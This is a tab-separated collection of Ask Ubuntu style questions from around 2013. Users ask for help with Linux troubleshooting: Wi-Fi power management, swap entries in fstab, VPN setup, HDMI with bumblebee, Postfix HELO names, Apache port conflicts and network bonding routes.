277023	will an livecode application developed for ubuntu destop work for ubuntu mobile ?	i was wondering if the any applications developed with livecode ( www.runrev.com ) for a desktop linux platform would be able to run natively on ubuntu mobile devices ( tablets ) . livecode can generate android apps and desktop linux apps ... my question is in reference to desktop linux apps as i have several that i would like to use on a tablet . if true then this would save me a great deal of re-coding livecode for android . thanks .
277027	how can one disable wi-fi power management when using jupiter ?	background and problem my laptop ( lenovo thinkpad x131e 3372-2vu , running ubuntu 12.04 lts ) freezes when ubuntu tries to manage the wireless interface 's power . i had to manually disable wireless power management to prevent the freezes , and it never happens ever since i did . however , now i use jupiter in order to save battery while not on ac power , and it seems that wireless power management is back on , and the system freezes started happening again . is there a way to configure jupiter to not manage wireless interface power ? or is it enough to just disable the power management manually ( i.e . jupiter wo n't turn it back on again ) ? the jupiter applet has been doing an excellent job otherwise . it has literally doubled my laptop 's battery life . so i 'd much rather have jupiter around . symptoms running iwconfig on boot would show the following , even after manually setting wireless power management off ( sudo iwconfig eth2 power off ) before rebooting or shutting down : eth2 ieee 802.11abg essid : '' 287lyonst . '' mode : managed frequency:2.437 ghz access point : f8 : d1:11:9b:89:81 retry long limit:7 rts thr : off fragment thr : off power management : on thanks in advance .
277029	why i have 2 swap paritions ?	i 'm new in using ubuntu , i just installed ubuntu 12.10 and everytime i start up the pc , a message tell me that the drive /dev/mapper/ubuntu-swap_1 is not ready yet or not present . this is my current situation : sudo blkid /dev/sda1 : uuid= '' fa675e68-de82-4257-8960-bb312d08e113 '' type= '' ext2 '' /dev/sda5 : uuid= '' nlq7rm-qbya-qs4y-if3b-nlay-fhzq-dklhr8 '' type= '' lvm2_member '' /dev/mapper/ubuntu-root : uuid= '' bf5875d5-5cdd-4b08-a16e-168f75e535e9 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 1acc7002-dc75-452d-b46f-034c03c00f5e '' type= '' swap '' in the etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=fa675e68-de82-4257-8960-bb312d08e113 /boot ext2 defaults 0 2 /dev/mapper/ubuntu-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 in the forum there are suggestions to change the name with uuid , but in my case in fstab there are 2 swap . should i change it anyway ?
277030	is there a checkpoint client for ubuntu ?	i use checkpoint vpn software to connect to my office network on windows . i tried a lot to configure the same on ubuntu vpn , but never succeeded . anyone aware of any specific software/steps to configure vpn . i connect using a gateway and random pin generation token .
277038	problem with d-link dub-e100 usb to ethernet adapter	i am trying to use a d-link dub-e100 usb to ethernet adapter . it uses the asix 8817x chipset . i have ubuntu 12.04 kernel 3.2.0-39 . the driver supplied with the adapter did not compile . i downloaded an asix driver ver 4.6.0 . it compiled and i loaded the module . the lsusb command rerurns the following : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader bus 002 device 005 : id 2001:1a02 d-link corp . bus 006 device 002 : id 13ba:0017 unknown ps/2 keyboard+mouse adapter bus 007 device 002 : id 046d : c52a logitech , inc. ifconfig does not report the adapter . lshw -c network does not report the adapter . please help . bob
277043	help getting hdmi output with bumblebee	running ubuntu 12.04 64 bit . gnome shell as interface . graphics card of nvidia gt555m . drivers - bumblebee and not nvidia 's . can get great vga support ( which is also on card ) and optimal screen res . optirun works and gives good outputs ( 125~ frames/sec & & 172~ mpx/sec ) . no xorg.conf . tried getting hdmi output with xrandr but still do not work . ideas ? x @ x : ~ $ dpkg-query -l | grep bumb ii bumblebee 3.1-1~preciseppa1 nvidia optimus support ii bumblebee-nvidia 3.1-1~preciseppa1 nvidia optimus support using the proprietary nvidia driver can anyone help me to get hdmi output working ? even while connected to hdmi , screen can get current and indicate that it is connected to a card , but xrandr gives : screen 0 : minimum 320 x 200 , current 3040 x 900 , maximum 8192 x 8192 lvds1 connected 1600x900+1440+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1600x900 60.0*+ 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1440x900_59.90 59.9* hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) disper did not help and gave me this : x @ x : ~ $ disper -l display lvds1 : lvds1 resolutions : 640x480 , 800x600 , 1024x768 , 1152x864 , 1360x768 , 1440x900 , 1600x900 display vga1 : vga1 resolutions : 640x480 , 848x480 , 800x600 , 1024x768 , 1440x900 thank you very much for your help .
277049	updating the vlc youtube parser	i tried to open a url in vlc . but i am getting the error that `` your input ca n't be opened : vlc is unable to open the mrl 'http : //www.youtube.com/watch ? feature=player_detailpage & v=n7_ekrpjzqs ' . check the log for details . the start pictures are running through ! not one video is played ! i followed all the instructions , but did not get the result . vlc - youtube videos wo n't play anymore
277050	ubuntu one sync notifications not showing when using encfs	i have followed encrypting data in ubuntu one to set up ubuntu one with encfs . it 's working well and i can save files on one device and instantly read them on the other . i have verified that the files are truly encrypted by trying to download them from the ubuntu one web interface . the only problem is that i am not getting notification messages from ubuntu one when i add new files or when new files are synced . also , there are no helpful `` syncing '' and `` checked '' indicators superimposed over my file 's icons so i have no way of knowing when a file has finished syncing . have i do n't something wrong or missed something in the setup , or is this just a trade-off i have to accept if i want to use encfs with ubuntu one ? if it 's the latter , are there any alternative ways of encryping on a per-file basis on ubuntu one ?
277053	will ubuntu phone will be ported to other phones ?	i have a samsung wave y ( gt-s5380d ) and willing to change a bada 2.0 on ubuntu . bada has a lot of bugs and samsung has stopped developing it . for samsung wave i and wave ii was the ubuntu phone port . can i transfer my ubuntu on my mobile phone ? is canonical engaged in porting to other phones ? thanks for your attention .
277054	blank login screen for laptop with intel 965 express chipset family	i have been using ubuntu 12.04 , current kernel is 3.5.0.02-generic . i have downloaded and installed 2 days ago intel linux graphics installer deb file suitable for mobile intel 965 express chipset family . after one day , i can not boot in ubuntu , i have a black login screen . this should have generated my problems i suspect . i have tried the following options in grub menu : removing quiet and adding nomodeset options : stuck in the spash screen remove splash & quiet : tty1 remove quiet : black screen remove splash & quiet , add nomodeset : tty1 remove splash : black screen replase splash with no splash : black screen start old kernel ( 3.0.2.37 ) : nothing i have also tried apt-get -check , -update , -upgrde , -purge , -autoremove , ... all no changes . in recovery mode , i tried dpkg which resulted in no changes and start in graphics safe mode which stays in terminal . whenever i try to startx from terminal , i receive message x can not stat /etc/x11/x is there any way to remove packages installed on 30th and 31/3/2013 ?
277055	ubuntu is mostly written in c # ?	on ohloh , ubuntu is reported as `` mostly written in c # '' , and indeed if we go to the ubuntu 's languages summary we see that c # has the most locs , accounting approx . 20 % from the code base . if the ohloh 's engine is n't wrong , which is the explanation of this ?
277056	ubuntu network manger keep creating ad-hoc hotspot . no infrastructure . a bug ?	i 'd like to share my ubuntu wired connection with a wifi android tablet . to do that i could use the `` use as hotspot ... '' function in system settings- > network . as i can understand , android has issues with ad-hoc hotspot function of the network manager , which is the default option in hotspot . problem is that when i change from ad-hoc to infrastructure in the `` options '' the change is not immediate . if i stop and restart the hotspot , a brand new config is created , even a new password , but always as ad-hoc . for every attempt i can see in the network connections a new hotspot config but i ca n't find a way to `` reuse '' the one i setup with infrastructure option . btw , my wifi card can work as ap because hostapd works fine .
277057	fatal error : could n't find any fabfiles !	i need to execute the command sudo fab deps_local , but i get this message : fatal error : could n't find any fabfiles ! remember that -f can be used to specify fabfile path , and use -h for help . aborting . what 's the problem ?
277060	problem regarding open cv graphing	i want to know that if i want to do graphing in open cv would i have to install seperate library for this purpose or it can be plotted using other ways .
277062	bluescreen after installing ubuntu 12.04 with wubi	first : i not good in english and totaly new with linux . i googling and it 's say that ubuntu good for fresh user . my problem here , i installed ubuntu 12.04 with wubi . when my pc boot it give two option , windows xp or ubuntu . i choose ubuntu but nothing appearing except grub look alike command prompt in windows . i am trying to exit this `` grub '' but nothing working . since nothing happen , i force shut down ( push off power button ) , seem like my biggest mistake . it cost me which i can not boot to windows xp anymore . the most stressful thing is , this pc is goverment work which a lot of important files in my document which not recovery yet . and my pc set with password . currently i use my notebook hardisk ( have windows 7 in it ) as temp , so i still can doing work . i can not access my own files because it is protected . what should i do ?
277064	bcm 4313 proprietary driver blocks wifi for other devices	i run a home wlan and a few days ago i upgraded a hp dv7 pavilion laptop from oneiric to precise . i had the proprietary broadcom sta driver ( wl module ) activated . whenever this laptop was connected to wifi had speedtest.net result of 8 mbps ( down ) and all other machines ( laptops , smartphones ) could only get speedtest.net results well below 1 mbps ( mostly 500 kbps ) with severe ping problems and other bizarre effects . when the laptop was off everything was ok for the other machines . thinking about this a little i decided to remove the sta proprietary driver and use the opensource one . everything works perfectly now for all the machines on the wifi . i wonder if the sta driver update in precise is rotten since it appears that it transformed my machine into a wifi jammer . is this possible ? it seems that this issue is lined to the bcm 4314 itself , not a particular laptop . what may be the possible reason for such a peculiar behavior ? can i overcome it without disabling the proprietary driver ? what can i do to troubleshoot this problem ?
277069	which email client is fast enough for a maildir containing one million emails ?	i have a maildir , which subfolders contain about one million emails . mutt is so slow on it . any better choice ? ps : an email deduplicate tool contained is better . normal scripts keep the index in memory which end up being killed .
277071	i over-wrote my xorg.conf with nvidia-settings and lost my xfce settings	i changed some monitor resolution things with the nvidia tool ( saved to /etc/ .. xorg.conf ) and when i restarted xfce i had lost all styling of taskbar , icons , defaults fonts etc.. what can i do to either bring the old xorg.conf back or restore my settings otherwise ? ( i tried using the settings manager but to no avail ) http : //pastebin.com/u1mgtcqe
277077	is there any way to see all the special characters in a special keyboard layout ?	i just set my ubuntu keyboard to icelandic ( dvorak ) but have no idea where all the special keys are located . is there a way to see the layout graphically ?
277078	outlook.com and google apps email notifier for gnome-shell ?	so , pretty basic question , i use outlook.com for some work email , i use multiple google apps emails for different things . i do n't use an email client , i just use the different webmail interfaces , what i am hoping i can find is an email notifier that can check outlook.com emails , and multiple google apps emails and gives me a notification ?
277079	re-mounting an un-mounted usb stick	is there a way to mount back a usb stick that is once ejected , without physically detaching it and then plugging it in ? it was a live-usb of linux mint 14 in it , if it helps .
277089	ca n't remove 2 entries in the download window	i started downloads of several files in firefox . while downloading , there was no free space left on my hard disk . i got some error messages ( with wording like `` not enough free space '' and `` cancelled download '' ) . i deleted all newly downloaded files ( the completed and the cancelled ones ) manually . problem : in the download window two of these downloads are still listed and ca n't be removed . as you can see on the screenshot , i ca n't clear the list by clicking the button in the bottom left corner ( it 's inactive ) . selecting `` pause '' or `` cancel '' in the context menu does n't do anything .
277095	cyborg m.m.o.7 mouse extra buttons - no 11-mouse.conf	i have a cyborg m.m.o.7 mouse with quite a few extra buttons , and i 'd like to be able to bind them to things . i 've found a post here that seems to detail the process , but when i attempted to carry out the steps i noticed that there is no `` etc/x11/xorg.conf.d/11-mouse.conf '' file . i discovered that apparently later versions of ubuntu use `` usr/share/x11/xorg.conf.d '' but there is still no 11-mouse.conf file . # dir /usr/share/x11/xorg.conf.d/ 10-evdev.conf 50-synaptics.conf 51-synaptics-quirks.conf 11-evdev-quirks.conf 50-vmmouse.conf 11-evdev-trackpoint.conf 50-wacom.conf can i simply create this file ? will the steps stated in the post work ? thanks , ym
277097	multiple screens support in x server	i have some basic questions about support for multiple screens in x server . probably these are dumb questions but it would very helpful if someone could answer and also point me where i can read more about this . multiple screens in x server refers to multiple monitors or there can be one monitor with multiple views controlled by different screens . only xorg.conf is supposed to be changed or anything else also to achieve .
277101	vpn for university	just wondering how to get vpn working on ubuntu 12.10 for my university because the instructions are n't very good for linux ( as usual ) . they have a file which i can open with gedit that contains the following : description=it services host=vpn-gateway.mcc.ac.uk authtype=1 groupname=linux grouppwd= enc_grouppwd=050f69c04aecdc0322cad699cfcdb5579913c3761ef95f2be74ada9e4ea678568ed8463e8686760af824644ee897e8e595079c8419c289c5 enableispconnect=0 ispconnecttype=0 ispconnect=cigmr ispphonebook=c : \documents and settings\all users\application data\microsoft\network\connections\pbk\rasphone.pbk ispcommand= username= saveuserpassword=0 userpassword= enc_userpassword= ntdomain= enablebackup=0 backupserver= enablemslogon=1 mslogontype=0 enablenat=1 tunnelingmode=0 tcptunnelingport=10000 certstore=0 certname= certpath= certsubjectname= certserialhash=00000000000000000000000000000000 sendcertchain=0 peertimeout=90 enablelocallan=0 so i guessed this much : ( the gateway i found on the website somewhere , but it might be wrong ) any ideas about why it does n't seem to work ? it attempts to connect but just gives up in the end .
277105	audacious uses volume control when i 've configured the media hotkeys	using ubuntu 12.10 on an asus u30sd . i 've managed to get audacious to recognize my laptop 's media keys ( fn-play , etc ) for playback , but it also hijacks the volume hotkey , so i ca n't change the system volume when using audacious . changing the volume only changes the audacious volume . anyone have ideas how i can have both ? i want the hotkeys for play , next track , etc , but i do n't want to control audacious volume with my volume keys ( which are also fn-keys ) . thanks
277106	generating wi-fi for mobile phone from linux	i use ubuntu 12.04 and wish to share its internet with my wi-fi enabled phone . i know how to use wireless network as hotspot using gui . but it works only for other laptops . my android phone ca n't even detect it . is there a way to generate wi-fi so that i can share my laptop internet with my phone ? i have tried the following link , but due to some reason , it stops my laptop internet as well . http : //thebeautifullmind.com/2012/09/19/sharing-internet-over-wifi-between-ubuntu-and-android/ also , can anybody please explain how is the wi-fi generated ? i know how to create a dhcp server by editing the configuration file . so , i used to think that when i click `` use as hotspot '' , some configuration file changes as a result of which internet is shared with other devices . if so , why would n't a mobile detect the hotspot and a laptop has no difficulty in using the shared internet ? please help .
277111	ubuntu boots to black screen until battery is removed and reinserted	i have a toshiba laptop that was running windows 8 . i installed ubuntu 12.10 and deleted windows 8 in the install . ubuntu worked fine until i shut the pc down . when i tried to start it again it would just go to a black screen . if i take the battery out of the pc and put it back in and turn the pc on ubuntu will work . how do i fix this problem ?
277112	hdmi - > displayport / dvi adapter cable - does it work ?	the computer i 'm buying only has hdmi . my display has dvi and displayport . will i be able to hook them up using an `` hdmi to displayport '' converter cable in ubuntu 12.04 ? the videocard is intelhd 4000 . thanks .
277119	ethernet not working ( neither even detected ) on ubuntu 12.04	ethernet is not being detected on my computer running ubuntu 12.04 with lamp . the last thing i remember doing is following this tutorial : http : //www.howtoforge.com/linux-basics-set-a-static-ip-on-ubuntu here is the checks that i have performed . hope it could help . thanks ! vest @ vest-blue-server : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:224 errors:0 dropped:0 overruns:0 frame:0 tx packets:224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:16736 ( 16.7 kb ) tx bytes:16736 ( 16.7 kb ) vest @ vest-blue-server : ~ $ clear vest @ vest-blue-server : ~ $ lspci -nnk | grep -ia2 net 00:07.0 bridge [ 0680 ] : nvidia corporation mcp61 ethernet [ 10de:03ef ] ( rev a2 ) subsystem : asustek computer inc. m4n68t series motherboard [ 1043:83a4 ] kernel driver in use : forcedeth vest @ vest-blue-server : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 48:5b:39 : eb:72:8e broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:23 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:240 errors:0 dropped:0 overruns:0 frame:0 tx packets:240 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:17680 ( 17.6 kb ) tx bytes:17680 ( 17.6 kb ) vest @ vest-blue-server : ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet ghcp vest @ vest-blue-server : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten vest @ vest-blue-server : ~ $ lsmod module size used by snd_hda_codec_realtek 224066 1 snd_hda_intel 33773 3 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 nouveau 774641 3 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event ttm 76949 1 nouveau drm_kms_helper 46978 1 nouveau serio_raw 13211 0 drm 242038 5 nouveau , ttm , drm_kms_helper snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq k8temp 13057 0 edac_core 53746 0 i2c_algo_bit 13423 1 nouveau mxm_wmi 12979 1 nouveau wmi 19256 1 mxm_wmi edac_mce_amd 23709 0 snd 78855 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device video 19596 1 nouveau soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm bnep 18281 2 bluetooth 180104 7 bnep parport_pc 32866 1 ppdev 17113 0 asus_atk0110 18078 0 i2c_nforce2 13058 0 mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47199 0 hid 99559 1 usbhid sata_nv 32286 2 forcedeth 63460 0 pata_amd 14118 0 vest @ vest-blue-server : ~ $ cat /etc/udev/rules.d/70-persistent-net.rules # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x10de : /sys/devices/pci0000:00/0000:00:07.0 ( forcedeth ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 48:5b:39 : eb:72:8e '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 ''
277122	nvidia-settings overrides my xfce settings ( styles , fonts , colors )	i added a monitor via the nvidia settings tool and saved to /etc/x11/xorg.conf . when i restarted x all the wm styles seemed grey and `` default '' - basic . i moved xorg.conf.backup to xorg.conf , restarted x and then it was ok. then i added the monitor again via nvidia settings and this time saved to .nvidia-settings-rc to my home drive . again when i started x i got the same problem . i even deleted completely the nvidia-settings.rc file and still the same .
277123	online activiation within wine , port 80	i have a program that i simply received as an .exe file . installation seems to work with wine but it asks to activate the product online . the preset is to use the internet explorer settings but as i do n't have neither windows nor the internet explorer i am stuck . there is a setting to route the request via a proxy server and port 80 but i have no idea what to make of it . how do i activate this port to use within wine ? i have tried to uncheck the use proxy server box with the same result : i opened up a terminal to track what wine is doing , navigated to the .exe file and started it . the activation screen occurs ( picture 1 ) . here is the output : fixme : shell : ishellbrowser_fnonviewwindowactive stub , 0x136a78 ( 0x156af8 ) fixme : shell : ishellbrowser_fnonviewwindowactive stub , 0x136a78 ( 0x156af8 ) fixme : exec : shell_execute flags ignored : 0x0000000c p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x33fdcc ) : stub fixme : wtsapi : wtsregistersessionnotification stub 0x204d6 0x00000000 fixme : x11drv : sync_window_opacity lwa_colorkey not supported fixme : font : removefontmemresourceex ( 0x8771dcc9 ) stub fixme : font : removefontmemresourceex ( 0x877df699 ) stub fixme : wtsapi : wtsunregistersessionnotification stub 0x204d6
277129	can i make a bridge to get internet from the wifi on my laptop ?	can i make a bridge to get internet from wifi on my laptop to my desktop pc with ethernet cable ? yes ? how ? my laptop is running win7 and my desktop ubuntu .
277133	how to add a new user in ubuntu 12.04 , and how i give them a root user privileges	how to add a new user in ubuntu 12.04 , and how i give them a root user privileges
277135	ir remote button being recognised by ir-keytable but not by irw	i am having a strange problem where one button on my media center remote is not being recognised by irw . i have it setup to receive ir-keytable scans via devinput . i have had the same environment working before , only thing that has changed is a format of the / partition . ir-keytable -t successfully recognises the button as *key_enter 0x001c* and in lirc 's devinput map the button is successfully listed as *key_enter 28* does any body know where i should be looking ? additional information can be provided .
277142	when installing ubuntu onto usb drive , mount point differs from when launching with it	so i installed ubuntu onto a usb flash drive ( like actually installed it , not made a liveusb . i used an existing liveusb to press install and put it on the other usb drive instead of that one ) . now when i installed it , the usb drive was located in /dev/sdc , but when i try to boot from it , it is located at /dev/sdb , and i get the error /dev/sdc1 does not exist . how can that be fixed ? is there a way to make this work on any position ( e.g . sda / adb / adc etc ... ) ?
277143	how can i complete the failed upgrade to ubuntu 12.04 lts ?	i tried to upgrade to 12.04 lts but it got stuck at 36 minutes to complete upgrading . i restarted the computer and can not boot my previous version of ubuntu 2.6.32 . it stuck at this message : since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility..
277144	buffer i/o error on device sdb after dmsetup	i reinstalled a server which was obsolete for its normal business . there is a raid controller inside with 2 hdd 's ( 80gb each , with ubuntu 12.04.2 server installed ) and 4 ssd 's ( 32gb each ) with a logical volume on the ssd 's ( sdb ) . after removing the logical volume by entering the following command ( it seems the lvm was n't removed with the installer ) : $ dmsetup remove /dev/mapper/data-mysql but now i ca n't do any real stuff with the ssd 's on sdb . when i enter 'fdisk -l ' in the terminal , it waits a few seconds and print the following errors : end_request : i/o error , dev sdb , sector [ 32|72|96 ] buffer i/o error on device sdb , logical block [ 4-16 ] the ssd 's are working properly before so my guess is they are not broken . at the moment i can not even install grub on sda as i get the same errors . does anyone know how to fix this problem ? there is still a directory or file in /dev/mapper , but it is 'control ' and it seems it ca n't be removed by dmsetup .
277146	sluggish refresh when scroll on texteditor	it 's about two days that i realized that i 've got a strange problem on texteditor ( gedit , but also geany and others ) . when i scroll the text ( with mouse but also with page down/up ) it did n't refresh properly . only after few clicks on it the situation return to normality . all other things seems to work nicely ( for example : scrolling text on libreoffice it 's not a problem ) . it seems a gtk+ problem ... but how to solve this issue ? thanks a lot ! update : it seems that cairo-dock it 's responsable of the problem . with only unity or gnome all works fine , when i launch cairo dock ( opengl or not is the same ) then gedit and other editors slow on refresh . normally i use cairo dock + unity session . all worked fine and so i think that the problem starts with the latest update ( some days ago ) . update 2 : trying to install other text editors ... for example : x2 editor works fine with the same document that cause problems with gedit/geany .
277153	ca n't create partitions on installation	attaching a couple of screenshots to better explain . so in the 1st screen , i ca n't click anything . new partition table is disabled , so are the rest of the buttons . clicking install , results in an error . in the 2nd screen you can see that i do n't have any option to set a mount point for my newly created partition . also if i use gparted to create my partitions , the installer does n't see any of them . any ideas how i can install ubuntu ? i had no problems installing it on a different machine . also i think the hdd was running a windows before without any problems . updated the questions with the result of fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000914db device boot start end blocks id system /dev/sda1 2048 1953523711 976760832 83 linux
277156	change postfix name from `` localhost '' to something meaningful ?	i run postfix my servers to allow websites to send email . i 'm using it as a drop-in for sendmail proper . when an email is sent the helo string seems to contain localhost . this would n't be a problem except that one of my clients has just said that an email was returned to them from a spam blocker saying that localhost can not feature inside the helo string . awesome . so i edited /etc/mailname to be my main domain name . and i edited /etc/postfix/main.cf so that : smtpd_banner = esmtp $ mail_name yet this is what i see in the header of a sent email ( after restarting postfix ) : delivered-to : oli @ example.com received : by 22.194.173.22 with smtp id bi10csp117521wjc ; tue , 2 apr 2013 07:24:18 -0700 ( pdt ) x-received : by 10.68.22.168 with smtp id pt8mr24540246pbb.10.1364912657736 ; tue , 02 apr 2013 07:24:17 -0700 ( pdt ) return-path : < oli @ example.com > received : from localhost ( example.com . [ 22.22.22.22 ] ) by mx.google.com with esmtp id l6si2328296pao.283.2013.04.02.07.24.16 ; tue , 02 apr 2013 07:24:17 -0700 ( pdt ) i 've subbed my domain with example.com . what do i need to edit to quash the evil reign of localhost ? !
277162	apache fails to start , address already in use ( but not really )	i 'm trying to set up a vm running ubuntu 12.04 . i have two virtual hosts configured using port 80 , but apache will not start . i get this error : ( 98 ) address already in use : make_sock : could not bind to address 0.0.0.0:80 the output of netstat -tulpn shows that nothing is using port 80 . what could possibly be causing this ?
277163	how do i disinfect ubuntu that is running a virus ?	my 12.04 system has just been infected with a virus and it is self-replicating a load of rubbish directories in the /proc/ area . this may crash my computer completely soon . i can not delete any of this rubbish even as root . how do i disinfect an ubuntu system that has a virus running wild as root ?
277169	`` module rtl8192ce not found '' - howto reinstall ubuntu 's realtek driver ? ( on12.04 )	on trying to get my rtl8188ce wireless card to work reliably , i tried installing the rtl8192ce driver directly from realtek 's website . however , now i got a kernel panic everytime i tried to load the driver . i was able to remove it again in safemode using realtek 's make uninstall script . now there is no driver for my card at all and it does n't show up in network-manager any more . when i try to manually load the rtl8192ce module i get : fatal : module rtl8192ce not found . so how can i reinstall the original ubuntu rtl8192ce driver so i have at least some connectivity ?
277170	ubuntu boot usb flash does not work	my laptop is a dell inspiron 5520 with a sticker of ubuntu on it . i have downloaded ubuntu desktop 12.10 64-bit and made my ubuntu bootable usb flash drive . i restarted my computer . it gave a black screen with one line begins with : syslinux 4.06 -- - 1992 - 2012 and then there was no response . how can i fix this and get the ubuntu flash drive to boot ?
277173	ubuntu 12.04 - multimonitor - office use - update amd drivers ?	i am on a triple monitor 12.04.2 64-bit ( and will stay till the next lts ) . i have an ati 5850 with the amd catalyst drivers installed ( fglrx ) , version 12.10 . i do not play games . the only thing i require is a smooth ( er ) multi monitor experience . should i update to the newest 13.1 amd drivers ? are there any changes to see for someone not playing games ? is the multimonitor experience better in 12.10 or 13.04 ?
277175	12.04 - extra default route breaks internet	ubuntu 12.04 desktop with wired network connection , eth0 and eth1 bonded and bridged . after reboot ping ubuntu.com fails ping 8.8.8.8 fails access to web server by noip domain name fails access to web server by external ip address fails access to web server ( ssh , etc . ) by internal ip address succeeds ( another machine ) the culprit seems to be a route on eth0 . this route seems odd because eth0 is bonded and bridged into br0 and is n't used as eth0 . route output destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 default 192.168.0.1 0.0.0.0 ug 100 0 0 br0 link-local * 255.255.0.0 u 1000 0 0 br0 192.168.0.0 * 255.255.255.0 u 0 0 0 br0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0 192.168.122.0 * 255.255.255.0 u 0 0 0 virbr0 if i add a gateway route for br0 ( duplicating the second line above except metric=0 ) by running route add default gw 192.168.2.1 br0 ping works and access from outside the local network is possible . route output after above destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 br0 default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 default 192.168.0.1 0.0.0.0 ug 100 0 0 br0 link-local * 255.255.0.0 u 1000 0 0 br0 192.168.0.0 * 255.255.255.0 u 0 0 0 br0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0 192.168.122.0 * 255.255.255.0 u 0 0 0 virbr0 how do i prevent the route ( s ) on eth0 from being created ? ( i note there 's another eth0 route in the list . again , i do n't know why eth0 would have routes on it when it 's bonded . ) should i do something to change the metric on br0 's default route to 0 ? ( if so , what ? ) /etc/network/interfaces iface lo inet loopback auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet manual bond-miimon 100 bond-mode balance-rr bond-slaves none auto br0 iface br0 inet static address 192.168.0.105 gateway 192.168.0.1 dns-nameservers 192.168.0.1 8.8.8.8 8.8.8.4 dns-search xxx.xxx.xxx < - localhost 's domain name netmask 255.255.255.0 bridge_ports bond0 bridge_stp off bridge_fd 0 bridge_maxwait 0 thanks .
